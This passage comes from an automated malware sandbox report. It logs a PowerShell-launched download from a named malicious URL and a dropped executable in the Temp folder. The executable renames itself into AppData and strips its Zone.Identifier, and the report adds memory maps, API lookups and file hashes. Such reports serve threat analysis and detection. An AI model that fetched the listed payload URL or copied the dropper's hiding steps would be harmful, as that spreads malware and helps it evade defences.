| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Environment (41)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
41 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 338 bytes |
| Total Data Received | 132.00 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | lifewithdogmovie.com |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729) |
| Server Name | lifewithdogmovie.com |
| Server Port | 80 |
| Data Sent | 338 |
| Data Received | 135168 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = lifewithdogmovie.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /0K3jRwA |
|
1 | |
| Send HTTP Request | url = http://lifewithdogmovie.com/0K3jRwA |
|
1 | |
| Receive HTTP Status | status = 200 |
|
1 | |
| Read Response | size_out = 135168 |
|
1 |
Process #6: jta.exe
58
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\aetadzjz\appdata\local\temp\jta.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Temp\jtA.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:50, Reason: Child Process |
| Unmonitor | End Time: 00:01:54, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbc8 |
| Parent PID | 0xb08 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BCC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00032fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00093fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x000a0000 | 0x00106fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00127fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x00148fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0015ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00157fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001f8fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0021ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00227fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00697fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x00820fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000830000 | 0x00830000 | 0x008effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x008f0000 | 0x00bbefff | Memory Mapped File | r |
|
|
|
- |
| jta.exe | 0x01140000 | 0x01162fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000001170000 | 0x01170000 | 0x0256ffff | Pagefile Backed Memory | r |
|
|
|
- |
| esent.dll | 0x75000000 | 0x751a2fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
Module (24)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x75a10000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76220000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\jta.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\jtA.exe, size = 260 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x34f53c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x34f484 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x34f49c |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x34f4c0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x34f4c0 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x34f4c0 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x34f4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x75a19894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x75a19cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77e4e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x762d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x762311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76231700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76231809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x762317ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7624eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x762314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76235929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x762314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x762311c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x76253102 |
|
1 |
Keyboard (32)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Read | virtual_key_code = VK_HELP, result_out = 0 |
|
32 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEMB08 |
|
1 | |
| Create | mutex_name = PEMBC8 |
|
1 |
Process #7: jta.exe
73
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\aetadzjz\appdata\local\temp\jta.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Temp\jtA.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:52, Reason: Child Process |
| Unmonitor | End Time: 00:02:04, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbdc |
| Parent PID | 0xbc8 (c:\users\aetadzjz\appdata\local\temp\jta.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BE0
0x
BFC
0x
488
0x
56C
0x
79C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00032fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00060000 | 0x000c6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000e7fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x00108fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00128fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0024ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00257fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00250fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00267fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00261fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x00270000 | 0x00270fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00281fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00296fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x002c0000 | 0x002c3fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x002c0000 | 0x002c3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x003d0000 | 0x003effff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00440000 | 0x00443fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00450fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x0061efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0072ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00730000 | 0x0075ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x007dffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x007e0000 | 0x00845fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a37fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x00bc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x00bd0000 | 0x00e9efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ee0000 | 0x00ee0000 | 0x00fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001100000 | 0x01100000 | 0x0113ffff | Private Memory | rw |
|
|
|
- |
| jta.exe | 0x01140000 | 0x01162fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000001170000 | 0x01170000 | 0x0256ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000025c0000 | 0x025c0000 | 0x026bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000026c0000 | 0x026c0000 | 0x02ab2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ad0000 | 0x02ad0000 | 0x02b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b40000 | 0x02b40000 | 0x02c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c70000 | 0x02c70000 | 0x02d6ffff | Private Memory | rw |
|
|
|
- |
| esent.dll | 0x75000000 | 0x751a2fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x754a0000 | 0x754c0fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x754d0000 | 0x755c4fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x755d0000 | 0x7576dfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75f20000 | 0x75f31fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76530000 | 0x76574fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76580000 | 0x7671cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77750000 | 0x77776fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\AppData\Local\Temp\jtA.exe | 132.00 KB |
MD5:
912807d798d35323a534fdb59399a9b0
SHA1: 2060d9f147311fdeec4de5f5d940b7a6f849846d SHA256: 78ccba1d9e5d32658ce4cd4b2f8a8be65c6aa6a4f4eec2016777afb3a50ac843 SSDeep: 3072:ePsv/P6gmhkFDDQKSZ4k5AF6xIsawMlkgu866:S9QD+zyF6xIsaFXP |
|
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Move | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe | source_filename = C:\Users\aETAdzjz\AppData\Local\Temp\jtA.exe |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe:Zone.Identifier | - |
|
1 |
Module (25)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x75a10000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76220000 |
|
1 | |
| Load | user32.dll | base_address = 0x77820000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\appdata\local\temp\jta.exe | base_address = 0x1140000 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x3cf724 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3cf66c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3cf684 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x3cf6a8 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3cf6a8 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x3cf6a8 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x3cf6a8 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x75a19894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x75a19cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77e4e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x762d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x762311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76231700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76231809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x762317ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7624eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x762314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76235929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x762314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x762311c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x76253102 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
Keyboard (32)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Read | virtual_key_code = VK_HELP, result_out = 0 |
|
32 |
System (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 171554 |
|
2 | |
| Get Time | type = Ticks, time = 172568 |
|
1 | |
| Get Time | type = Ticks, time = 173582 |
|
1 | |
| Get Time | type = Ticks, time = 174596 |
|
1 | |
| Get Time | type = Ticks, time = 175610 |
|
1 | |
| Get Time | type = Ticks, time = 176624 |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Release | - |
|
1 |
Process #8: cofiretlnt.exe
55
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:02:05, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x808 |
| Parent PID | 0xbdc (c:\users\aetadzjz\appdata\local\temp\jta.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
804
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00032fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
